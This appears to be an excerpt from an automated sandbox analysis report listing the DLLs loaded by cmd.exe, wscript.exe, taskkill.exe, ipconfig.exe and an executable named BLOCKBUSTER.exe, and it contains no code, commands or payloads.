Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msxml3.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msdart.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: zipfldr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: slc.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: pcacli.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\cmd.exe	Section loaded: sfc_os.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: version.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_is2022.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_g18030.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_gsm7.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: c_iscii.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: unrar.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: 7zxa.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: magnification.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: d3d9.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: security.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\_672365339188b\BLOCKBUSTER.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: framedynos.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: dbghelp.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: winsta.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\taskkill.exe	Section loaded: mpr.dll
